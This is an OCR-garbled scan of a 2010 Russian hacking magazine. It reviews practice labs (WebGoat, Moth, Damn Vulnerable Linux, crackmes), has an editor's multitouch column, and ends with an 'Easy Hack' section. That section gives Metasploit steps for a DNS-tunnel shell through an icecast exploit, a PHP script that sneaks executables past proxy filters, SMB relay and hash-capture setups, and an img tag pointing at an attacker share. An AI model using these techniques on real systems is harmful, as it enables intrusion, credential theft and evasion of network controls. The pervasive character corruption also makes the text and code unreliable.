3. Переходим в браузере по ссылке 
ШрУ/ІосаІЬозі/ѴѴеЬбоаі/аиаск . 

4 . Авторизируемся как диезДдиезЕ 

5 . Пробуем свои силы. 

Задания, как правило, привязаны к реальной 
проблеме. Например, в одном из квестов 
предлагается провести 5(Х-инжекцию с 
целью украсть список поддельных кредитных 
номеров. Некоторые задания сопровождаются 
учебной составляющей, показывающей поль- 
зователю полезные хинты и уязвимый код. 



ЗЕСІШІВЕЮ 

Когда пройдешь все замысловатые квесты 
ѴѴеЬбоаЕ можешь перейти на более сложный 
проект Зіапіюгб ЗесигіВепсЬ. Дело в том, что 
разработчики не писали его с нуля, умыш- 
ленно оставляя слабые места — вместо этого 
они пошли по другому пути и собрали под- 
борку из 8 реально существующих программ. 
Все они написаны на баѵа: форумный движок 
]'Ьоа гб, блогерский сценарий ЫиеЫод и так 
далее. Само собой, в качестве образцов были 
выбраны достаточно старые и сырые релизы, 
которые не раз светились в багтраках. И тем 
не менее, это вполне реальные приложения, 
создатели которых задумывались о защи- 
те, а потому эксплуатировать бреши будет 



БесигіВепсИ включает устарев- 
шие версии ^ЕЕ 



Непростые квесты на ^ЕЕ 



ТотСаІ-сервер — к счастью, он уже включен 
в сборку ѴѴеЬбоаІ и настроен так, чтобы запу- 
стить его можно было максимально просто: 

1. Сначала распаковываем ѴѴеЬ6оа1:-0ѴѴА5Р_ 
Зіапбагб-х.х.гір в рабочую директорию. 

2 . Стартуем демон ТотСаКа, запустив ѵѵебдоаЕ 



Головоломки для хакера 



Ое&сгірЕіоп оі ЙесшіВепсІі Арріісаііопз 

Мой арріігатіог’л: Ейг 5 іап?аггі ЗесигіЕйпеН *ге арйп-ййиге* ргадг 
.ІіЛЬЬ Ес-пнк-і-.:, [-:і:плІ 2 г л ап-^ гв 1 а[е <1 ІесНпоІс-аі-ва. 


В-спсЕшіагк 








]Ьоагй 


4 Ьаэт 4 іе а ЬиІІеІІп Ьоаггі ргй|*Я імтПсл Іп ^аѵа. гі і 
№ 4 пК«пмі соте кпоѵ'Іегідв сш іЬе» ііЬчгі* 


ЫисЪІоч 


БІй-дтд арріісаііагѵ 




із Л ГиІІ ЛЕЕ АрркіСйІібП Ев 

сГетспзІгяіе №-еіг ипгі-сіз-іапгіі^р Ьѵ в-яріоіііпд в п 
ртѵНа НіпЬя апсі еНо л 1 ЬЬе иясг соокіса. рагашв^ 
БЩи іп] 4 ЪіОЛ [р я Г»кй сягсі ^ІакаЬаса.. 



Один из самых интересных способов развлечься со взломом, поломав голову над 
хакерскими задачками — это хакерские квесты. Некоторые из таких квестов ведут 
рейтинг, в котором учитывается время решения задачки и количество неправильных 
попыток для ввода результата. Если ты когда-нибудь пробовал проходить наши 
][-конкурсы, то понимаешь, о чем идет речь. Несколько квестов и сейчас доступны в 
рамках проекта гіпдОсир.ги . так что если хочешь попробовать силы в поиске автора 
зловредного трояна, утащив у него архив с логами, или в расшифровке сдампленного 
трафика, в котором передавались финансовые потоки предприятия, то добро пожа- 
ловать. Ресурсов, предлагающих такие квесты, довольно много — кратко расскажу о 
некоторых из НИХ: 

• тоб-х.сот . В этой онлайн игре ты становишься одним из агентов структуры Моб- 
X, тебе даются задания и ты должен их проходить. Задания разделяются на разные 
уровни сложности, поэтому чем дальше у тебя получится пройти, тем интереснее будет 
играть. 

• Ьах.іог.ЬиАл/еІсоітіе. В этом квесте сначала придется пройти разминку, выполнив 5 
простых заданий. 

• диезібзЬ-тѵ.пате/іпбех.рЬр . Очень неплохой квест, предлагающий задания на 
самые разные темы, в том числе крякмисы. 

• ѵіспит.сірбегіюсЬз.сот . Соревнование «Саріиге ѣЬе Над», включающее большое 
количество ][-заданий. Кстати, ты можешь узнать, как устроена игра изнутри — исход- 
ники проекта открыты [ зоигсе! : огде.пеі/рго]ес1:5А/іспипп ]. 

Список можно продолжать и дальше. Если этого перечня тебе окажется мало, а вероятно, 
так и будет, рекомендую ресурс Ьаскегдатез.пеф на нем собрано более 150 ссылок на 
квесты и челленджи с комментариями игроков, а также мануалами по прохождению. 
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► ОЗЗ 







Запускаем МоІМ под ѴМѵѵаге 







> іпіо 

Мы не зря расска- 
зываем о легальных 
площадках для 
взлома. Это лучший 
способ попробовать 
свои силы во взломе, 
ничем при этом не 
рискуя. 




> сЫ 

Большую часть из 
представленных в 
обзоре проектов ты 
найдешь на БѴБ- 
приложении 
кжурналу 



уже не так просто. По сути, ЗесигіВепсЬ — всего лишь 
сборник уязвимых программ, поэтому каждую из них тебе 
придется устанавливать и настраивать вручную, пред- 
варительно позаботившись о настройке сервера ТотсаЕ 
Примечательно, что проект родился в ходе работы авторов 
над утилитами для статического анализа кода, поэтому 
если будешь искать подопытных кроликов, чтобы поте- 
ститьтулзы для исследования сорцов, то приложения из 
ЭесигіВепсб — как раз то, что надо. 

мотн 

Еще один сборник реально существующих приложений, 
но в совершенно ином виде представлен в проекте МоШ. 
От других проектов его отличает то, что распространяется 
он в виде образа для виртуальной машины, в которой 
установлена ІІЬипІи 8.10. Собственно, все, что потре- 
буется для запуска, — это любой из продуктов ѴМѵѵаге, 
способный запустить виртуальную машину, в том числе 
бесплатный ѴМѵѵаге Ріауег [ ѵѵѵѵѵѵ.ѵтѵѵаге.сот/ргосІисіБ/ 
ріаѵег ). Изначально МоОп настроен на получение всех 
сетевых настроек от ОНСР-сервера, поэтому надо убе- 
диться, что сетевые параметры в настройках виртуальной 
машины выставлены соответствующе (у меня, к примеру, 

ІР выдает роутер, поэтому я просто выбрал режим ВгібдесІ, 
выпускающий виртуальную машину в физическую сеть]. 
Далее достаточно запустить виртуалку, залогиниться в 
систему (тоіЬ/тоІЬ), посмореть ііюопбд'ом полученный 
системой ІР и обратиться к админке МоіЬ через браузер: 
ЫірУАтоІІі-ір асісігезз: . Ты попадешь на главную стра- 
ницу, откуда можно перейти на предустановленные на 
сервер скрипты известных продуктов: блогерский движок 
ѴѴогсІргезз 2.6.5, форум Ѵапіііа 1.1.4 и другие разработки на 
базе РНР/МуЭОБ, а также один проект на Заѵа + Тотсаіб + 
Му50І_. Для усиления реальности происходящего реали- 
зованы три способа для обращения к скриптам: напрямую, 
через тоб_5есигі1;у, и через РНР-Ю5: 

1 . ТШСр : //тоЕЛ/ѵѵЗа:Е/аи(ІіЦ/хзз/зітр1е_хзз . 
р]зр?СехС=<зсгірС>а1егС ( 'хзз 1 ) ;</зсгірС> 

2. ЪРСр : / /шоСЬ./шо(3._зесигіЦу/ѵѵЗаТ/аи(ТіС/хзз/ зітр1е_ 
хзз .рЬр?СехС=<зсгірЦ>а1егС ( 'хзз 1 ) ;</зсгірС> 

3. ТЩДр : //тоСІі/р1ір-і(із/ѵѵЗаТ/аи(ііС/хзз/зішр1е_ 
хзз .р!ір?СехС=<зсгірС>а1егС ( 1 хзз 1 ) ; </зсгірС> 
Моб_5есигі1:у и РНР-Ю5 представляют из себя ѴѴАР (ѴѴеЬ 
Арріісабоп РігеѵѵаЩ и предлагают дополнительную защиту 
для веб-приложений (подробнее в нашей статье «Файрвол 
для веб-приложений» в октябрьском номере «Хакера»]. 
Каждый из них ведет подробный лог подозрительных 
запросов, поэтому это еще и отличный способ разобрать- 




Импровизированный банковский сайт для 
взлома 



ся, как эти самые ѴѴАР работают и как можно их обмануть. 
Сам проект обновляется, и авторы обещают в ближайшем 
будущем добавить уязвимые приложения, написанные на 
РуіЬоп и НиЬу. 

ТЕСТОВЫЕ ПЛОЩАДКИ ПРОДУКТОВ ПО ИБ 

Сам дистрибутив МоіЬ создавался со вполне конкретной 
целью. Также, как мы собирали систему для удобно- 
го тестирования антивирусов с помощью виртуальных 
машин, так и автор МоіЬ компоновал дырявые веб- 
проекты, чтобы иметь возможность удобно тестировать 
автоматические сканеры безопасности. В результате у 
него получилась платформа, на которой он смог проте- 
стировать коммерческие продукты и открытый фреймворк 
ѵѵЗаб [ ѵѵЗаі.зоигсеІЪгде.пеі І. специально разработанный 
для упрощения поиска и эксплуатирования уязвимостей 
в веб-приложениях. Тут надо сказать, что производители 
коммерческих сканеров безопасности и сами активно 
занимаются созданием подобных площадок для проведе- 
ния полевых испытаний. В конце концов, где еще им отла- 
живать свои продукты и демонстрировать их возможности 
клиентам? Так, разработчики АсіФепіх ѴѴѴ5 предлагают 
сразу три сайта на разных платформах: іезірбр.асипебх. 
сот . Іезіазр.асипебх.сот . ІезІазрпеЕасипебх.сот . 
Тестовый ресурс от НР (в теории для их НР ѴѴеЫпзресІ:] 
находится по адресу гего.уѵеЬаррзесигіІѵ.сот . Площадка 
для взлома от разработчиков ІВМ Пабопаі АррЗсап рас- 
полагается на сІетоТезіТіге.пеІ:. Не надо ломиться туда для 
поиска багов вручную, а вот попробовать на этих проектах 
автоматические сканеры в действии можно вполне. 




Раскрученный йатп ѴиІпегаЫе Ыпих -*• 

УЯЗВИМЫЕ ОС 1 

А вот создатель рѴѴпОЭ решил не ограничиваться только 
веб-приложениями и решил выпустить на основе вирту- 
альной машины уязвимую систему, поставив перед тобой 
задачу «получи гооБа». Легенда следующая: тебя, как пен- 



► 034 
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(д атеі/апгі 

щ-Іи п тегііа 



ѵѵѵѵѵѵ.хлко- 



мидаягСвояСВ ° 



В НОМЕРЕ: 

пгац ДРТЫ ЫА5 НОУ 



1 Н чЗ іѴІ С»* ^■ в . Т о тюНЕРЫ • МОДДИНГ. 



„ мпЯ . чешреядрапготиб двух ». 

Д ТИШКНХ4Ѵ8««Е№МИХ2. — М 



#04. 174 І Апрель 2010 



рѴО в комплекте 

ВИДЕОКАРТЫ 

БЫСТРЕЕ НЕ 
ПРИДУМАЕШЬ 

• • • 

НОУТБУКИ 

ПОРТАТИВНЫЕ, 

НО МОЩНЫЕ 

ТЮНЕРЫ 

безтелевизора 






РЕКЛАМА 




^ ^ Ьи КлсК_ТЪЕ_РлКаОі5с » рОѵѵпЬох Сглскіп* СЬвІІсп** #4 




сгасктез.сіе: задания и прохождения 
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тестера, нанимают для изучения защищенности одного из 
выделенных серверов. Вот тут и начинается игра: поиск 
живых хостов птар'ом, поиск уязвимых сервисов, полу- 
чение сертификатов для доступа по 53Н, поиск локаль- 
ных сплоитов и так далее — короче, рай для новичков. 
Инструкции, как заставить это работать под ѴігІиаІВох'ом, 
советы и рекомендации по прохождению можно найти на 
форуме Іюгитз.ЬеогоЕпеЕ 

О проекте йатп ѴиІпегаЫе Біпих [ѵѵѵѵѵѵ.атпѵиІпегаЫеІіпих.огд ) 
мы писали уже не раз. Это, пожалуй, наиболее раскручен- 
ная разработка из всех сегодня представленных. В своем 
дистрибутиве разработчики намеренно оставили бажные 
демоны, на которых можно легко применить сетевые 
сплоиты, уязвимые сценарии, позволяющие выполнить 
наиболее распространенные виды атак (ЭОБ-инъекция, 
Х55 и т.д.], и просто недостаточно защищенные приложе- 
ния, специально для того, чтобы желающие могли потре- 
нироваться эти самые уязвимости находить. Система рас- 
пространяется в виде ЫѵеСВ-образа и легко запускается 
под виртуальной машиной ѴМѵѵаге или ѴігШаІВох. Другой 
проект йе-ІСЕ РепТезІ состоит уже не из одной системы, а 
из трех. Легенда такова: генеральный директор некой ком- 
пании должен провести пентест своей ИТ-инфраструктуры, 
чтобы отчитаться перед советом директоров. Будучи 
уверенным, что с безопасностью и так все в порядке, он 
для галочки нанимает новичка и поручает ему сделать 
пентест одного из серверов. Когда ты справишься с этим 
заданием, тебе предложат сделать более сложный пентест 
другой системы — это второй квест. Когда и здесь обна- 
руживаются критические ошибки, директор отдает тебе 
на растерзание диапазон ІР-адресов и говорит: «Делай, 
что хочешь!». Каждое из трех заданий распространяется в 
виде БіѵеСО и также отлично запускается под виртуальны- 
ми машинами. Инструкции по настройке и шпаргалки по 
прохождению ищи на бе-ісе.Ьаскегбетіа.сот/боки.рбр . 

КРЯКИНГ И РЕВЕРСИНГ 

На протяжении всей предыдущей части материала мы 
касались исключительно веб-взлома, обходя стороной 
взлом программ. Что же делать тем, кто хочет удариться в 
реверсинг? К счастью, в этой области проблем с квеста- 
ми никогда не было. Начинающие сгаскег’ы и опытные 
реверсеры могут развлекаться на небольших программах, 
которые специально созданы для того, чтобы их взло- 
мали. Я говорю о так называемых сгасктез’ах, которые 
можно скачать, например, с ѵѵѵѵѵѵ.сгасктез.сіе или ѵѵѵѵѵѵ. 
ІбЬаск.сот . Для удобства они рассортированы по слож- 
ности: начиная от самых простых заданий, специально 
рассчитанных на тех, кто только осваивает отладчик, и 
заканчивая сложными задачками с массой антиотладоч- 



ных трюков, которые могут поспорить с серьезной защитой 
у настоящих программ. Упершись в тупик, всегда можешь 
попросить помощи у огромного компьюнити, к тому же для 
многих из крякмисов выложены мануалы по прохождению. 
Кстати говоря, если ты действительно решился взяться 
за сгаскіпд, рекомендую прочитать наш старый материал 
«Сгаскіпд — это просто» из ][ #08/2005. Все основные 
моменты и простейшие приемы мы рассматривали на 
одной из популярных подборок сгасктез'ов. 

РАЗРАБОТКА СПЛОИТОВ 

Если внимательно изучать описания последних сплоитов, 
несложно заметить, что большинство из них эксплуати- 
руют старые версии приложений, которые по-прежнему 
остаются в ходу. Самый ходовой пример — ІЕ8, запу- 
щенный под ѴІ5Та/ѴѴ7, практически не ломают, а для ІЕ 
6/7 под ХР даже публичные сплоиты выходят каждый 
месяц. Вот с «осла» и начнем: где взять старую версию, 
если система давно обновила его до «восьмерки»? Тебе 
поможет ІпТетеТ Ехріогег Соііесбоп [ ЕпаІЬиіШз.есІзкез. 
пеіУіесоЦесбоп.Ыт ). С помощью одного инсталлятора ты 
сможешь разом установить все версии Іпіегпеі: Ехріогег 
и в случае необходимости быстро переключаться между 
ними. Программа прописывает в системе различные 
движки ІЕ и делает это так, чтобы они не конфликтовали 
между собой. Правда надо иметь в виду, что для старых 
версий браузера могут возникнуть проблемы с их запуском 
под последними версиями винды. Понятно, а как быть 
с другими браузерами и вообще любыми программами: 
где найти старую уязвимую версию? Конечно, уязвимости 
лучше искать в новых версиях — это как-то правильнее :). 
Но если все-таки хочешь поэкспериментировать с гото- 
выми сплоитами, разобраться что к чему, тебе помогут 
сервисы уууууу.оШаррз.сот и оШѵегзіоп.сот, где хостятся 
устаревшие версии программ. Можно, например, скачать 
полсотни различных версий ѴѴіпатр'а, начиная с релиза 
0.2 — только представь, сколь давно это было. 

ЗАЧЕМ? 

Можно сколько угодно читать готовые инструкции и 
вслед за кем-то повторять якобы «взлом». Или скачивать 
готовые сплоиты и пытаться применить их, абсолютно не 
понимая, что они делают. Но разве тебе это интересно? 
Ведь если разобраться во всем, а каждый шаг делать с 
пониманием, то и удовольствия от процесса ты получишь 
гораздо больше. Этот материал едва ли будет полезен 
опытным пентестерам, но если ты только начинаешь 
свой путь, возьми эти решения на заметку. Более эффек- 
тивного и безопасного способа освоить азы пентеста не 
существует. -;-;- 
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КОЛОНКА РЕДАКТОРА 



Мультитач в наших руках 

Вообще довольно забавная штука — эти 
патенты. Вот запатентовал Арріе мульти- 
тач для своих мобильных телефонов, — и в 
гуглофоне ІЧехиз Опе, оказавшемся на тесте 
в редакции, такая возможность отключена. 

Не потому, что в компании НТО не смогли это 
реализовать, а потому, что нельзя: патенты 
не позволяют. Если посмотреть на график по 
количеству выданных «бумажек», то налицо 
плохая тенденция. Недавний пример, боодіе 
патентует свою главную страницу: логотип, 
форму для поиска и две кнопки. Что, теперь 
такую комбинацию нельзя использовать? 
Судиться будем? Вместо прогресса впереди 
маячит одна сплошная гонка «Патентовать 
все, авось в будущем принесет деньги». 
Правило простое — кто успел, тот и съел. 
Только страдает от этого кто? Правильно, мы 

— обычные пользователи. Впрочем, написать 
я все-таки хочу не об этом. 

Покопавшись на форумах, все-таки нашел, 
как этот проклятый мультитач активировать. 

Это несложно, но и мне не сильно нужно — в 
том плане, что телефон все равно отдавать. 
Гораздо интереснее было провернуть такой 
же трюк с ноутбуком, на котором мультитача 
никогда не было. Я не слишком большой фанат 
эффектных перелистываний и чумовых зумов, 
но вот скролла двумя пальцами на ноутбуке 
мне не хватало всегда. Почему бы не попро- 
бовать? Тут надо сказать, что мой Азиз ѴѴ6Р 

— уже далеко не новый и сурово потрепан 
жизнью, поэтому в успех всей затеи я до конца 
не верил. В качестве тачпада в ноуте установ- 
лен Эупарбсз, т.е. самый распространенный 
вариант. Как правило, от ноутбука к ноутбуку 
отличается лишь версия, у меня, к примеру, — 
ТоисбРаб Ѵ6.2. 

Первым делом я полез за драйверами на 
официальный сайт Зупаріісз, но тут, как и ожи- 

теагіу Раіегй РІІігчр еу Арріе, нтс Алй беедіс 




особенно после появления іРНопе 
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далось, меня ждал провал: никаких новых фич 
вроде мультитача или вообще чего-либо еще 
в них нет. Впрочем, пока я искал официаль- 
ные драйвера, на глаза попался интересное 
сообщение с западного хардварного форума 
( Іюгитз.Ьагбмагегопе.сот.зд/збоѵѵШгеасІ. 
рбр?р=44505922 ]. Человек выложил ссылку 
на дрова для ноутбуков НР, которые... якобы 
активируют мультитач на старых ноутбуках! 
Производитель ноута большой роли не играет, 
поэтому недолго думая, я тут же установил их 
себе и с радостью обнаружил в настройках 
новый пункт «Прокрутка двумя пальцами». 
Быстрое включение опций и окно для тре- 
нировки отбросили все сомнения: мультитач 
работает! Помимо этого заработали и так 
называемые Оезіигез (жесты приложений, 
как их перевели на русский язык]. С помощью 
трех пальцев стало возможным перелистывать 
фотографии, а с помощью единовременного 
нажатия оперативно запускать заданные при- 
ложения. А у Эупарбсз нашелся еще и заме- 
чательный продукт БсгуЬе [ ѵѵѵѵѵѵ.изсгѵЬе.сопп ). 
который вообще позволяет очень эффективно 
управлять системой с помощью таких вот 
дезіигез. 

Судя по отзывам пользователей, новые драй- 
веры работают на самых разных буках: А51І5, 
ІВМ, БеИ, Эатзипд и т.д. Однако есть и такие, 
у кого новые дрова не завелись — остался не у 
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Программный мультитач 



дел и мой старый ВепО. Но! 

Оказалось, реализовать мультитач можно 
вообще без модифицированных драйверов! 
На сосіе.доодіе.сопп есть любопытные проект 
с незатейливым названием піИоп-пикНе- 
зсгоіі ( собе.доодІе.сот/р/пібоп-пикіію-зсгоЦ ]. 
Программе реально удается эмулировать 
мультитач (требуется небольшая настрой- 
ка] без всякого вмешательства в драйвера. 
Причем, судя по юзернейму автора, он нахо- 
дится в России, что особо приятно, іні 
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ЗАДАЧА: ЗАЛИТЬ ШЕЛЛ-КОД НА 
ВЗЛОМАННЫЙ СЕРВЕРПРИ АКТИВНОМ 
ФАЙРВОЛ Е СЖЕСТКИМИ ОГРАНИЧЕ- 
НИЯМИ 

РЕШЕНИЕ: 

РігеѵѵаІГы относятся косновным средствам защиты при работе в сети. Сейчас 
они используются повсеместно, встраиваются в ОС, хотя некоторые из них скорее 
создают иллюзию безопасности. При взломе они создают множество неудобств, 
например, за счетограничений открытых портов, на которые можно повесить шелл, 
или запрещают исходящие соединения, лишая нас возможности заюзать Ьаск- 
соппесішелл. Поэтому приходится работать стем, что доступно. К примеру, 0І\І5. Он 
очень редко блокируется или фильтруется, но при этом доступен всем пользовате- 
лям (ато какже без него ползать по инету]. Вотэтим-то мы и воспользуемся. 

Есть прекрасная технология для организациитуннеля посредством ВЫВ, и про- 
граммулина к ней — сІпБсаі (что-то вроде аналога пеісаі]. Идея же заключается в 
следующем: 

У нас есть ОЫЗ сервер ехатріе.сот , а любые запросы на поддомены от 
клиента будут приходить на него. Таким образом, клиент может пересы- 
лать на сервер информацию запросом зотебаіа.ехатріе.сот . сервер же 
может отвечать на нее в теле ОЫЗ-ответа. Объем передаваемой инфор- 
мации невелик — около 150 байт за запрос, но это не очень мало с учетом 
того, что со стороны все выглядит вполне легитимно. Сервер сам по себе 
не может подключаться к клиенту, так как это не предусмотрено протоко- 
лом, потому для активного взаимодействия клиент должен подключаться 
через определенные промежутки времени. 

Но это уже давняя технология, так что же в ней нового?! 

А новое то, что совсем недавно хороший человек по имени Поп запихнул бпзсаі 
в шеллкод! И что еще более приятно — запихнул его в теІазрІоіЕ Модуль еще 
находится на стадии тестирования и имеетряд ограничений, но пользоваться им 
уже можно. Только представь себе, какие возможности открываются! 

Итак, нам потребуется: 

1 . Скачать и установить теіазріоіт 

2 . Скачать модуль по ссылке: 5кцЦзесипІ:ѵ.огд/ЫодсІаІ:а/сІп5саІ:-5ЬеЦ-ѵѵіп32.гЬ 
(или найти его на ОѴО). 

3. Скопировать его в директорию теІазрІоіСа тобиіез/рауіоасіз/зіпдіез/ѵѵіпбоѵѵз/. 

4. ТаккакбпзсаІ-сервереще не реализован в теіазрІоіТе, его требуется запускать 
отдельно следующим образом: 

а) скачать сіпзсаі: ( зкиЦзесигіІѵ.огд/ѵѵікі/іпсІех.рЬр/РпзсаІ І; 





б] запустить сервер на прослушку командой зибо ./бпзсаі -ІізЕеп; 

Пример использования: 

1 . Подгружаем эксплойт : 

шзЕ > изе ехр1оіС/ѵгіпбоѵгз/ЬЦЦр/ісесазС_]іеас1ег 

2. Прикрепляем к нему бпз саб -шелл : 

шзТ ехріоіб (ісесаз1:_]іеасіег) > зеб РАУБОАБ ѵтіпбоѵтз/сіпзсаб- 
зПе11-тп32 

РАУЬОАБ => ѵтіпбоѵтз/бпзсаб-зйе11-ш_п32 

3 . Определяем нашу цель : 

шзб ехріоіб (ісесазб_]іеас1ег) > зеб КНОЗТ 192.168.0.2 
КНОЗТ => 192.168.0.2 

4 . Выбираем ББЗ-сервер : 

шзб ехріоіб (ісесазб_?іеас1ег) > зеб БОМАШ ехашріе.огд 

БОМАШ => ехашріе.огд 

5. Запускаем эксплойт : 

шзб ехріоіб (ісесазб_]іеас1ег) > ехріоіб 

После чего на бпзсаРсервер будет произведено «подключение» от клиента, т.е. 
получен полноценный шелл. 

Еслиутебя нетсвоего сервера с ОИЗ, но оченьхочется протестировать работу, 
можешь поменять ргітагу бпз на свой ІР в конфигах на атакуемой машине. 



ЗАДАЧА: СКАЧАТЬ ФАЙЛ С ИНТЕРНЕТА, 
ЕСЛИ НА ПРОКСИ ЗАКРЫТ ДОСТУП НА 
СКАЧКУ ЕХЕ, 2ІР, ОІ.І- И Т.П. 

РЕШЕНИЕ: 

Бдящиеадмины, борясьслишнимтрафиком и нелегальным использованием 
рабочего инета, а также оберегая пользователей отсамих себя, часто прибегают к 
урезанию возможности скачивания, фильтруя -ехе, -і\р, -сііі итакдалее на ргоху- 
сервере. Как говорится, рубяттопором, что реально мешает работать. Проблема 
тривиальная, а потому решений имеет довольно много. Вотпарочка основных: 

► 038 



1. Воспользоваться открытыми файлообменниками. 

Файлообменников сейчас много, даже очень, и многие из них предоставляют 
отличную возможность — закачивать файлы судаленных серверов. Пропи- 
сываешь путь до файла — и все. Втечение пары минутон скачается и будет 
доступен через файлообменник. Воттолько тут есть подвох — многие из них 
оставляют расширение файла. Ктомуже большинство требует регистрации. 

2. Создать свой «файлообменник». 

Хотя, скорее, это будет конвертер. Суть будет такова: мы передаем скрипту на 
нашем сервере путь до файла, который требуется скачать, что он и делает. А 
после выдает нам ссылку с каким-нибудь удобным для нас расширением, іред 
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или рсН, кпримеру. Реально мы скачиваем ехе, а в логах ргоху будет отмечен 
іред. 

Нам понадобится достаточно хороший хостинге поддержкой рбр и директи- 
вы «аІІоѵѵ_игПореп» в рбр.іпі, которая даст возможность скачивать файлы с 
удаленных ресурсов. 

Минимальный исходник: 

<?рНр 

есбю СЕТ [ ' 1 ' ] . » . » . $_СЕТ [ 'б ' . . »<Ьг»> ; / / выводим ШЬ файла от- 
куда скачиваем 

$паше=гап(і ( 1 ,100) ; //задаем случайное имя итоговому файлу 
$бі1е = бі1е_деб_сопбепбз ($_СЕТ[ '1' ] $_СЕТ[ 'б' ] ) ; 1 1 

скачиваем файл 

$бр=бореп («$пате . зрд», »ѵгЬ») ///создаем файл на хостинге 
брибз ($бр, $бі1е) ; //заполняем его 



бсіозе ($бр) ; 

есбю <«а бігеб=$пате . ]рд>божі1оаск/а>>>; //выводим ссылку на 
него 
?> 

Готово! Для использования пишем в адресной строке: 

ЫгРр: //127 .0.0. 1/]рд.рбір?1=біббр : //боѵтіоаб.дір . ги/ 
дір8095&б=ехе 

И нам выводится ссылка на файл. Качаем и переименовываем. 

В общем -то, все. Хотя у этого метода есть ограничения: на размер скачиваемо- 
го файла или время скачивания. Но это все обходится в рбр.іпі. 

Скрипт, конечно, можно «расширить и углубить», так что сразу посмотри модуль 
рбр сигі, который увеличит возможности по скачиванию файлов. 



ЗАДАЧА: ПОЛУЧИТЬ ПРАВА АДМИН ИСТ- 
РАТОРАДОМЕНА 

РЕШЕНИЕ: 

Админские права — святая святых и получить их — благое дело. Способов — мас- 
са, но я напомнютебе парочку классических. Особенно приятното, что они есть в 
нашем любимом теіазріоібе. 

І.зтЬ геіау. 

Да, старый добрый зтЬ геіау. Этому виду атакуже больше 1 0 лет, а все из-за 
в криптографических проблем, проблем в дизайне МИМ -прото кол а, а также 
глубины, с которой он вшит в ОС. Каждый год исследователи придумываютс ним 
что-то новенькое. 

Напомнютебе (если вдругты запамятовал], чтозтЬ геіау — это классическая 
тап-п-тіббіе эта ка.т.е. хакер заставляет свою жертву аутентифицироваться на 
подконтрольном ему хосте и пересылаетэту информацию на сервер, которым хочет 
завладеть. За счет данных действий хакер получает доступ к серверу с правами 
жертвы. 

Теперьпопорядку(см. скриншот): 

1 . Хакер [аііаскег] заставляет свою жертву (ѵісііт) подсоединиться к себе. 

2 . Хакер подключается к серверу (іагдеі) и получает от него случайный 8-байтовый 
запрос. 

3. Хакер передает этотзапрос жертве. 

4 . Жертва отвечаетхакеру хешем пароля. 

5 . Хакер пересылает его на сервер и получает доступ к серверу с правами жертвы. 
Также существуетвариация, когда сервером является самажертва, но данная 
возможность была пофиксена Місгозоіі 2 года назад. 

Какуже было сказано, в МеІазрІоіГе существует модуль, реализующий зтЬ геіау- 
атаку. Делаем это через ѵѵеЬ-интерфейс: 

1. Выбираем эксплойт Місгозобб ЭДіпскжз 8МВ Веіау Собе 
Ехесибіоп. 

2. Выбираем рауіоаб. Например, депегіс/зЬе11_Ьіпб_бср . 

3 . Выставляем ЬРОКТ, то есть куда будет коннектиться шелл после 
запуска . 

4. Стартуем ЗМВНОЗТ с ір-адресом сервера, к которому хотим по- 
лучить доступ. 

5 . Запускаем эксплойт . 

Теперь, когда наша жертва подсоединится к нашему поддельному зтЬ-серверу, 
вся информации по аутентификации перенаправится на зтЬ-ЬозІ и мы получим 
необходимый доступ. 

2 . Использовать зтЬзпіІІег. 

УзгпЬ геіау есть небольшой недостаток — она не сохраняет используемые хеши, 
чтобы их можно было потом расшифровать. Как раз для этих целей, чтобы в итоге 





получить парольадмина, мы можем исполь- 
зовать модуль теіазріоіі’а — саріиге/зтб. 
Пример: 

1 . Подгружаем снифер : 

тзТ > изе аихіііагу/зегѵег/ 

сарбиге/зтЬ 

2 . Запускаем его 

тзб аихіііагу (зшЬ) > гип 

Главное же отличие отзтЬ геіау то, что 
в зтЬ-снифере используется опреде- 
ленный «случайный запрос», а именно 
1 122334455667788, что позволяет взло- 
мать пароль на основе радужныхтаблиц. В 
зтЬ геіауже он генерируется случайно. 
Остается последний вопрос, какже за- 
ставить жертву подсоединиться ктвоему 
серверу? Все достаточно просто. Из 
старых методов: требуется либо послать 
е-таіі, либо сгенерировать Ыті-стра- 
ничку со ссылками на твой ресурстакого 
вида: 

<ішд згс="\\Аббаскег\8НАКЕ\ 
бііе . ]рд"> 



Когда админ зайдетна нее, браузер захочет 
автоматически подгрузить изображение, а 
для этого ему придется аутентифицироваться 
натвоем сервере. 

Из новенького и, для большей скрытности, можно использовать Х55 уязвимости, 
коих развелось предостаточно в последнее время, или атаки по 0ІМ5, АВР. 

Если захочешь лучше разобраться втеме, почитай зесигіЫаЬ.ги/сопІезі/ЗІ 21 00. 
рЬр и 5есигіІѵІаЬ.ги/апаІѵІісз/362448.рЬр : 




$гедиезб .= "Изег-Адепб : Мо2І11а/4.0 (сошрабіЫе; М8ІЕ 6.0; 
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ш 






Еагу 


Еагу 


Еазу 


Наск 


Наск 


Наск 



Міпскжз ЫТ 5.1; МуІЕ2 ) \г\п" ; 

$гедиезк .= "Нозк: " . $?юзк . "\г\п"; 

$гедиезк .= "Сопкепк-ІепдкЪ: ". зкгіеп ($стй) . 
$гедиезк .= "Соппескіоп: Кеер-АІіѵе\г\п" ; 
$гедиезк .= " СасЬе-СогШгоІ : по-сасЬеХгЛп" ; 
$гедиезк .= " \г\п" ; 

$гедиезк .= $стс! . " \г\п" ; 

$зоскек = Езоскореп ($Ъозк , $рогк ? $рогк : 80); 
крикз ($зоскек, $гедиезк) ; 
ѵйіііе ( ! Ееок ( $зоскек ) ) 



еско Едекз ($зоскек , 1024); 
ксіозе ($зоскек) ; 



п\г\п" 



} 

?> 



3. Запускаем его следующим образом: 

ЪДкр : //ІосаІІюзк/іпрШ: .рДр?Дозк=шлд. ехатріе . 
сот&зсгірк=іпбех.ркр?раде=&стс1=р]іріп1о ( ) 



4. Наслаждаемся результатом :). 



№4 



ЗАДАЧА: ОПРЕДЕЛИТЬ КАКАЯ СМ5 ИС- 
ПОЛЬЗУЕТСЯ НА САЙТЕ И ТЕХНОЛОГИИ 
ЕЕ РАЗРАБОТКИ. 



РЕШЕНИЕ: Данный вопрос задается очень часто. Для начала стоит 
вручную научиться определять хотя бы основные стз. Способ прост: вы- 
искиваем стандартные сигнатуры на сайте и, используя Соодіе, находим 
название стз вплоть до версии. 

Искать следует в следующих местах: 

1. Информация в ИСшІ-ках сайта. 

2 . Поиск типичных путей к стилям и ]аѵа- скриптам. 

3 . Файл гоЬокз . кхк . 

4. Внешний вид ссылок. 

5. Анализ Пккр -заголовков и соокіез. 

7. Вид ошибочных страниц (ЕККОК404) . 

Но, руками-то — хорошо, да лень-матушка, а потому из автоматизирован- 
ных средств могу посоветовать тебе следующие сайты: 

ЪиіІкшЩІі.сот 
